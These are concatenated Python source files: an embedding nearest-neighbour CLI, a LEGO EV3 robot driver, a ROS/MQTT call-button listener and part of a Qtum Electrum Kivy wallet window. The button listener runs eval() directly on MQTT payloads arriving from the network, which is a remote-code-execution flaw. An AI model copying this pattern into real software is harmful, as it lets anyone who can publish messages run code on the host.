node_map[int(node_id)] = v
if as_ordered_list:
keys = list(node_map.keys())
keys.sort()
node_map = [
node_map[k]
for k in keys
]
return node_map
if __name__ == '__main__':
def _cli():
import optparse
parser = optparse.OptionParser(usage='Usage: %prog EMB1')
parser.add_option('-t', '--threads', dest='threads',
help='number of threads to use in the computation (min 2, default: %default)',
type='int', default=2)
parser.add_option('-o', '--output', dest='outputf',
help='file to write nearest neighbor results to (default: %default)',
default='output.csv')
parser.add_option('--vocab', dest='vocabf',
help='file to read ordered vocabulary from (will be written if does not exist yet)')
parser.add_option('-k', '--nearest-neighbors', dest='k',
help='number of nearest neighbors to calculate (default: %default)',
type='int', default=25)
parser.add_option('--batch-size', dest='batch_size',
type='int', default=25,
help='number of points to process at once (default %default)')
parser.add_option('--embedding-mode', dest='embedding_mode',
type='choice', choices=[pyemblib.Mode.Text, pyemblib.Mode.Binary], default=pyemblib.Mode.Binary,
help='embedding file is in text ({0}) or binary ({1}) format (default: %default)'.format(pyemblib.Mode.Text, pyemblib.Mode.Binary))
parser.add_option('--partial-neighbors-file', dest='partial_neighbors_file',
help='file with partially calculated nearest neighbors (for resuming long-running job)')
parser.add_option('-l', '--logfile', dest='logfile',
help='name of file to write log contents to (empty for stdout)',
default=None)
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
exit()
(embf,) = args
return embf, options
embf, options = _cli()
log.start(options.logfile)
log.writeConfig([
('Input embedding file', embf),
('Input embedding file mode', options.embedding_mode),
('Output neighbor file', options.outputf),
('Ordered vocabulary file', options.vocabf),
('Number of nearest neighbors', options.k),
('Batch size', options.batch_size),
('Number of threads', options.threads),
('Partial nearest neighbors file for resuming', options.partial_neighbors_file),
], 'k Nearest Neighbor calculation with cosine similarity')
t_sub = log.startTimer('Reading embeddings from %s...' % embf)
emb = pyemblib.read(embf, mode=options.embedding_mode, errors='replace')
log.stopTimer(t_sub, message='Read {0:,} embeddings in {1}s.\n'.format(len(emb), '{0:.2f}'))
if not os.path.isfile(options.vocabf):
log.writeln('Writing node ID <-> vocab map to %s...\n' % options.vocabf)
writeNodeMap(emb, options.vocabf)
else:
log.writeln('Reading node ID <-> vocab map from %s...\n' % options.vocabf)
node_map = readNodeMap(options.vocabf)
# get the vocabulary in node ID order, and map index in emb_arr
# to node IDs
node_IDs = list(node_map.keys())
node_IDs.sort()
ordered_vocab = [
node_map[node_ID]
for node_ID in node_IDs
]
emb_arr = np.array([
emb[v] for v in ordered_vocab
])
if options.partial_neighbors_file:
completed_neighbors = set()
with open(options.partial_neighbors_file, 'r') as stream:
for line in stream:
if line[0] != '#':
(neighbor_id, _) = line.split(',', 1)
completed_neighbors.add(int(neighbor_id))
else:
completed_neighbors = set()
log.writeln('Calculating k nearest neighbors.')
KNearestNeighbors(
emb_arr,
node_IDs,
options.k,
options.outputf,
threads=options.threads,
batch_size=options.batch_size,
completed_neighbors=completed_neighbors
)
log.writeln('Done!\n')
log.stop()
|
robot.py | #!/usr/bin/env pybricks-micropython
from pybricks.hubs import EV3Brick
from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,
InfraredSensor, UltrasonicSensor, GyroSensor)
from pybricks.parameters import Port, Stop, Direction, Button, Color
from pybricks.tools import wait, StopWatch, DataLog
from pybricks.robotics import DriveBase
from pybricks.media.ev3dev import SoundFile, ImageFile, Font
from math import pi
from PID import PID
from time import time
from threading import Thread
class Robot():
def __init__(self, brick, left_motor, right_motor, left_sensor, right_sensor=None,
front_arm=None, back_arm=None, gyro=None, wheel_diameter=62.4, axle_track=150):
self.ev3 = brick
self.left_motor = left_motor
self.right_motor = right_motor
self.front_arm = front_arm
self.back_arm = back_arm
self.left_color = left_sensor
self.right_color = right_sensor
self.gyro = gyro
self.wheel_diameter = wheel_diameter
self.axle_track = axle_track
self.ev3.speaker.set_volume(100)
self.ev3.screen.set_font(Font(size=14))
self.min_left = 5
self.max_left = 67
self.min_right = 4
self.max_right = 74
self.accelerate_encoder = 100
self.drive_base = DriveBase(self.left_motor, self.right_motor,
self.wheel_diameter, self.axle_track)
self.drive_base.stop()
self.straight_speed = (80 * 1020/100) // 1
self.drive_base.settings(straight_speed=self.straight_speed)
self.first_thread = False
self.second_thread = False
def move_front_arm(self, speed=30, mode="angle", value=0, then=Stop.HOLD, wait=True):
if self.front_arm == None:
self.ev3.screen.print("No arm to move")
self.ev3.speaker.beep(1000,3000)
return
dps = int(1500 * (speed / 100))
if mode == "angle":
self.front_arm.run_angle(dps, value, then, wait)
elif mode == "time":
self.front_arm.run_time(dps, value*1000, then, wait)
def move_back_arm(self, speed=30, mode="angle", value=0, then=Stop.HOLD, wait=True):
if self.back_arm == None:
self.ev3.screen.print("No arm to move")
self.ev3.speaker.beep(1000,3000)
return
dps = int(1500 * (speed / 100))
if mode == "angle":
self.back_arm.run_angle(dps, value, then, wait)
elif mode == "time":
self.back_arm.run_time(dps, value*1000, then, wait)
def stop(self, then="Brake"):
self.drive_base.stop()
if then == "Hold":
self.left_motor.hold()
self.right_motor.hold()
elif then == "Brake":
self.left_motor.brake()
self.right_motor.brake()
def straight(self, distance, speed=80, brake=False):
speed = (speed * 1020/100) // 1
self.drive_base.reset()
if speed != self.straight_speed:
self.drive_base.stop()
self.drive_base.settings(straight_speed=speed)
self.straight_speed = speed
self.drive_base.straight(distance * 10)
self.drive_base.stop()
if brake:
self.left_motor.brake()
self.right_motor.brake()
wait(10)
def turn(self, angle, brake=True):
self.left_motor.reset_angle(0)
self.right_motor.reset_angle(0)
self.drive_base.turn(angle)
self.drive_base.stop()
if brake:
self.left_motor.brake()
self.right_motor.brake()
#print((abs(self.left_motor.angle()) + abs(self.right_motor.angle())) // 2)
def pivot(self, speed=50, degrees=90, brake=True):
speed = (speed * 1020/100) // 1
self.left_motor.reset_angle(0)
self.right_motor.reset_angle(0)
if degrees > 0:
self.left_motor.run_angle(speed=speed, rotation_angle=degrees)
else:
self.right_motor.run_angle(speed=speed, rotation_angle=degrees)
if brake:
self.left_motor.brake()
self.right_motor.brake()
def drive(self, speed=80, turn_rate=0, mode="degrees", value=1, brake=False):
speed = (speed * 1020/100) // 1
self.drive_base.stop()
self.drive_base.reset()
self.drive_base.drive(speed, turn_rate)
if mode == 'degrees':
while (abs(self.left_motor.angle()) + abs(self.right_motor.angle())) / 2 < value:
pass
elif mode == 'time':
start_time = time()
while time() - start_time < value:
pass
elif mode == 'line':
if value == 1:
left_threshold = (self.min_left + 5)
while self.left_color.reflection() > left_threshold:
pass
elif value == 2:
right_threshold = (self.min_right + 5)
while self.right_color.reflection() > right_threshold:
pass
else:
right_threshold = (self.min_right + 5)
left_threshold = (self.min_left + 5)
while self.right_color.reflection() > right_threshold and \
self.left_color.reflection() > left_threshold:
pass
if brake:
self.drive_base.stop()
self.left_motor.brake()
self.right_motor.brake()
wait(100)
def lf_distance(self, port, speed=50, distance=0, accelerate=False, then="Nothing", pid_ks=(0.7, 0.1, 0.03), outer=False):
pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
pid.SetPoint = 0
pid.setSampleTime(0.01)
degrees = int(360 * (distance * 10 / (pi * self.wheel_diameter)))
self.left_motor.reset_angle(0)
self.right_motor.reset_angle(0)
v = vmax = speed
v0 = 30
if port == 1:
target = (self.min_left + self.max_left) // 2 + 10
sensor = self.left_color
k = 1
else:
target = (self.min_right + self.max_right) // 2 + 10
sensor = self.right_color
k = -1
if outer:
k *= -1
while (self.left_motor.angle() + self.right_motor.angle()) / 2 < degrees:
if accelerate:
v = int((self.left_motor.angle() / self.accelerate_encoder) * (vmax - v0) + v0)
if v > vmax:
v = vmax
accelerate = False
reflection_error = k*(sensor.reflection() - target)
pid.update(reflection_error)
u = int(pid.output)
self.left_motor.dc(v - u)
self.right_motor.dc(v + u)
if then == "Brake":
self.stop("BRAKE")
elif then == "Coast":
self.left_motor.dc(0)
self.right_motor.dc(0)
def lf_cross(self, port=1, speed=50, min_distance=0, accelerate=False, then="Brake", pid_ks=(0.7, 0.1, 0.03), outer=False):
pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
pid.SetPoint = 0
pid.setSampleTime(0.01)
degrees = int(360 * (min_distance * 10 / (pi * self.wheel_diameter)))
self.left_motor.reset_angle(0)
self.right_motor.reset_angle(0)
v = vmax = speed
v0 = 30
if port == 1:
target = (self.min_left + self.max_left) // 2 + 10
sensor = self.left_color
stop_sensor = self.right_color
stop_target = self.min_right + 8
k = 1
else:
target = (self.min_right + self.max_right) // 2 + 10
stop_sensor = self.left_color
sensor = self.right_color
stop_target = self.min_left + 8
k = -1
if outer:
k *= -1
while (self.left_motor.angle() + self.right_motor.angle()) / 2 < degrees or \
stop_sensor.reflection() > stop_target:
if accelerate:
v = int((self.left_motor.angle() / self.accelerate_encoder) * (vmax - v0) + v0)
if v > vmax:
v = vmax
accelerate = False
reflection_error = k*(sensor.reflection() - target)
pid.update(reflection_error)
u = int(pid.output)
self.left_motor.dc(v - u)
self.right_motor.dc(v + u)
if then == "Brake":
self.stop("BRAKE")
elif then == "Coast":
self.left_motor.dc(0)
self.right_motor.dc(0)
def calibrate(self):
self.ev3.screen.clear()
self.ev3.screen.print("press center to")
self.ev3.screen.print("calibrate colors")
while Button.CENTER not in self.ev3.buttons.pressed():
wait(10)
min_left = 100
max_left = 0
min_right = 100
max_right = 0
while Button.DOWN not in self.ev3.buttons.pressed():
left_value = self.left_color.reflection()
right_value = self.right_color.reflection()
if left_value < min_left:
min_left = left_value
if left_value > max_left:
max_left = left_value
if right_value < min_right:
min_right = right_value
if right_value > max_right:
max_right = right_value
self.ev3.screen.clear()
self.ev3.screen.print()
self.ev3.screen.print("Left: " + str(left_value))
self.ev3.screen.print("Right: " + str(right_value))
self.ev3.screen.print("Down to stop")
wait(40)
self.ev3.screen.clear()
self.ev3.screen.print()
self.ev3.screen.print()
self.ev3.screen.print("Min Left: " + str(min_left))
self.ev3.screen.print("Max Left: " + str(max_left))
self.ev3.screen.print("Min Right: " + str(min_right))
self.ev3.screen.print("Max Right: " + str(max_right))
self.ev3.screen.print("Center to exit")
while Button.CENTER not in self.ev3.buttons.pressed():
wait(50)
self.min_left = min_left
self.max_left = max_left
self.min_right = min_right
self.max_right = max_right
def forward_align(self):
self.drive_base.stop()
t1 = Thread(target=self.left_line_thread, args=(200, self.left_motor, self.min_left + 5,
(self.max_left + self.min_left) // 2, self.left_color))
t2 = Thread(target=self.right_line_thread, args=(200, self.right_motor, self.min_right + 5,
(self.max_right + self.min_right) // 2, self.right_color))
self.first_thread = False
self.second_thread = False
t1.start()
t2.start()
while self.first_thread == False or self.second_thread == False:
pass
self.pid_align(forward=True)
def left_line_thread(self, dps, motor, min_threshold, max_threshold, color_sensor):
self.first_thread = False
motor.run(dps)
is_stop = False
while color_sensor.reflection() > min_threshold:
pass
motor.run(-dps // 2)
while color_sensor.reflection() < max_threshold:
pass
motor.brake()
self.first_thread = True
def right_line_thread(self, dps, motor, min_threshold, max_threshold, color_sensor):
self.second_thread = False
motor.run(dps)
is_stop = False
while color_sensor.reflection() > min_threshold:
pass
motor.run(-dps // 2)
while color_sensor.reflection() < max_threshold:
pass
motor.brake()
self.second_thread = True
def backward_align(self):
self.drive_base.stop()
t1 = Thread(target=self.left_line_thread, args=(-200, self.left_motor, self.min_left + 5,
(self.max_left + self.min_left) // 2, self.left_color))
t2 = Thread(target=self.right_line_thread, args=(-200, self.right_motor, self.min_right + 5,
(self.max_right + self.min_right) // 2, self.right_color))
self.first_thread = False
self.second_thread = False
t1.start()
t2.start()
while self.first_thread == False or self.second_thread == False:
pass
self.pid_align(forward=False)
def pid_align(self, forward=True, dur=0.2, pid_ks=(1, 0.1, 0.03)):
left_thread = Thread(target=self.left_align, args=(forward, dur, pid_ks))
right_thread = Thread(target=self.right_align, args=(forward, dur, pid_ks))
self.first_thread = False
self.second_thread = False
left_thread.start()
right_thread.start()
while self.first_thread == False or self.second_thread == False:
pass
def left_align(self, forward=True, dur=5, pid_ks=(5, 0, 0)):
self.first_thread = False
pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
pid.SetPoint = 0
pid.setSampleTime(0.01)
start_time = time()
left_threshold = (self.min_left + self.max_left) // 2
k = 1
if forward:
k = -1
while time() - start_time < dur:
left_reflection_error = self.left_color.reflection() - left_threshold
pid.update(left_reflection_error)
left_u = int(pid.output)
self.left_motor.run(k * left_u)
self.left_motor.brake()
self.first_thread = True
def right_align(self, forward=True, dur=5, pid_ks=(0.6, 0.1, 0.02)):
self.second_thread = False
pid = PID(pid_ks[0], pid_ks[1], pid_ks[2])
pid.SetPoint = 0
pid.setSampleTime(0.01)
start_time = time()
right_threshold = (self.min_right + self.max_right) // 2
k = 1
if forward:
k = -1
while time() - start_time < dur:
right_reflection_error = self.right_color.reflection() - right_threshold
pid.update(right_reflection_error)
right_u = int(pid.output)
self.right_motor.run(k * right_u)
self.right_motor.brake()
self.second_thread = True
def control_motors(self, speed=600):
self.ev3.screen.clear()
self.ev3.screen.print("Front -> UP")
self.ev3.screen.print("Back -> DOWN")
motor = self.front_arm
while True:
if Button.DOWN in self.ev3.buttons.pressed():
motor = self.back_arm
break
if Button.UP in self.ev3.buttons.pressed():
motor = self.front_arm
break
self.ev3.speaker.beep()
self.ev3.screen.clear()
self.ev3.screen.print("Left - Right")
self.ev3.screen.print("buttons to move")
self.ev3.screen.print("Center to exit")
while True:
if Button.LEFT in self.ev3.buttons.pressed():
motor.run(speed)
elif Button.RIGHT in self.ev3.buttons.pressed():
motor.run(-speed)
elif Button.CENTER in self.ev3.buttons.pressed():
motor.stop()
break
else:
motor.stop()
self.ev3.speaker.beep()
|
button_listener.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import json
import math
import rospy
import socket
import threading
import fcntl
import struct
import uuid
import geometry_msgs.msg
import diagnostic_msgs.msg
from task_manager.msg import ButtonState
from task_manager.srv import TaskNewRequest
from task_manager.srv import TaskNew
import paho.mqtt.client as mqtt
button_dict={}
class StateListener:
#global button_dict
def __init__(self):
self.__sub_topic_name=rospy.get_param('~sub_topic_name',"iqr/callbutton/state")
self.__sub_topic_name2=rospy.get_param('~sub_topic_name2',"iqr/callbutton/goal")
self.__time_out=rospy.get_param('~time_out',10)
self.__looprate=rospy.get_param('~looprate',1)
self.robot_id = rospy.get_param('~mqtt_listener/client_id', "truck_01")
self.client = mqtt.Client(client_id=self.robot_id)
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.connect("192.168.40.122", 1883, 60)
self.pub = rospy.Publisher('callbutton/state', ButtonState, queue_size=10)
self._task_client = rospy.ServiceProxy("task_new", TaskNew)
def UDPLinstenLoop(self):
# rospy.loginfo("start udp linster..")
self.client.loop_start()
# The callback for when the client receives a CONNACK response from the server.
def on_connect(self, client, userdata, flags, rc):
print("Connected with result code "+str(rc))
if rospy.is_shutdown():
self.client.disconnect()
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
# self.client.subscribe([("iqr/default/callbutton/state", 0), ("iqr/default/agv_manager/state", 0)])
self.client.subscribe([(self.__sub_topic_name,0),(self.__sub_topic_name2,0)])
self.client.message_callback_add(self.__sub_topic_name, self.callback)
self.client.message_callback_add(self.__sub_topic_name2, self.callback2)
# message_callback_add(sub, callback)
def callback(self, client, userdata, msg):
# pass
rospy.loginfo("callbutton/state callback ")
#print(msg.payload)
null="wrong"
# msg_dict = "{"message_type": "state", "id": "btn_01", "state": "ready", "ip": "192.168.0.123", "mac_address": "FD:FD:FD:FD:FD:FD"}"
try:
eval(msg.payload)
except Exception as e:
print(repr(e))
print("there is a wrong in jeson_msg")
else:
msg_dict = eval(msg.payload)
msg_dict["time"]=str(rospy.get_time())
msg_id = msg_dict["id"]
#msg_state = msg_dict["state"]
#msg_ip = msg_dict["ip"]
#msg_mac_address = msg_dict["mac_address"]
button_dict[msg_id]=str(msg_dict)
print(button_dict)
def callback2(self, client, userdata, msg):
# pass
rospy.loginfo("callbutton/state callback ")
#print(msg.payload)
null="wrong"
# msg_dict = "{"message_type": "state", "id": "btn_01", "state": "ready", "ip": "192.168.0.123", "mac_address": "FD:FD:FD:FD:FD:FD"}"
try:
eval(msg.payload)
except Exception as e:
print(repr(e))
print("there is a wrong in jeson_msg")
else:
task_new_msg = TaskNewRequest()
# print(type(task_new_msg.task_info))
msg_dict2 = eval(msg.payload)
priority = eval(str(msg_dict2["priority"]))
sub_task = eval(str(msg_dict2["sub_task"]))
param = eval(str(msg_dict2["param"]))
print(msg_dict2)
print(priority)
print(sub_task)
print(param)
task_new_msg.type = "maniplator"
task_new_msg.priority = priority
task_new_msg.sub_task = sub_task
task_new_msg.param = param
self._task_client.call(task_new_msg)
# The callback for when a PUBLISH message is received from the server.
def on_message(self, client, userdata, msg):
rospy.loginfo("mqtt receive msg ")
# print(msg.topic+" "+str(msg.payload))
pass
def StatePubLoop(self):
lock = threading.Lock()
count = 0
ButtonState_id_list=[]
ButtonState_ip_list=[]
ButtonState_state_list=[]
ButtonState_mac_list=[]
#looprate
ButtonState_msg=ButtonState()
rate = rospy.Rate(self.__looprate)
while not rospy.is_shutdown():
if button_dict!={}:
#button_dict[b]
key_list=button_dict.keys()
for i in range(len(button_dict)):
single_button_dict=eval(button_dict[key_list[i]])
time_now=rospy.get_time()
dlat=time_now-float(single_button_dict["time"])
if dlat>self.__time_out:
lock.acquire()
button_dict.pop(key_list[i])
lock.release()
button_tuple=button_dict.items() #transform dict to tuple
for i in range(len(button_tuple)):
single_button_dict=eval(button_tuple[i][1])
ButtonState_id_list.append(single_button_dict["id"])
ButtonState_ip_list.append(single_button_dict["ip"])
ButtonState_state_list.append(single_button_dict["state"])
ButtonState_mac_list.append(single_button_dict["mac_address"])
ButtonState_msg.id=ButtonState_id_list
ButtonState_msg.ip=ButtonState_ip_list
ButtonState_msg.state=ButtonState_state_list
ButtonState_msg.mac_address=ButtonState_mac_list
ButtonState_msg.header.seq = count
ButtonState_msg.header.stamp =rospy.Time.now()
ButtonState_msg.header.frame_id = "ButtonState_msg"
self.pub.publish(ButtonState_msg)
ButtonState_id_list=[]
ButtonState_ip_list=[]
ButtonState_state_list=[]
ButtonState_mac_list=[]
count=count+1
rate.sleep()
#print(key_list)
#print(button_dict)
def main():
rospy.init_node('button_listener')
ML = StateListener()
# ML.NewTask()
t0 = threading.Thread(target=ML.UDPLinstenLoop,args=())
t0.start()
t1 = threading.Thread(target=ML.StatePubLoop,args=())
t1.start()
rospy.spin()
if __name__ == "__main__":
try:
main()
except rospy.ROSInterruptException:
pass |
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import qtum_electrum
from qtum_electrum.bitcoin import TYPE_ADDRESS
from qtum_electrum import WalletStorage, Wallet
from qtum_electrum.gui.kivy.i18n import _
from qtum_electrum.paymentrequest import InvoiceStore
from qtum_electrum.util import profiler, InvalidPassword
from qtum_electrum.plugin import run_hook
from qtum_electrum.util import format_satoshis, format_satoshis_plain
from qtum_electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='qtum_electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from qtum_electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from qtum_electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'qtum':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mQTUM')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Qtum Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from qtum_electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('qtum:'):
self.set_URI(data)
return
# try to decode transaction
from qtum_electrum.transaction import Transaction
from qtum_electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from qtum_electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
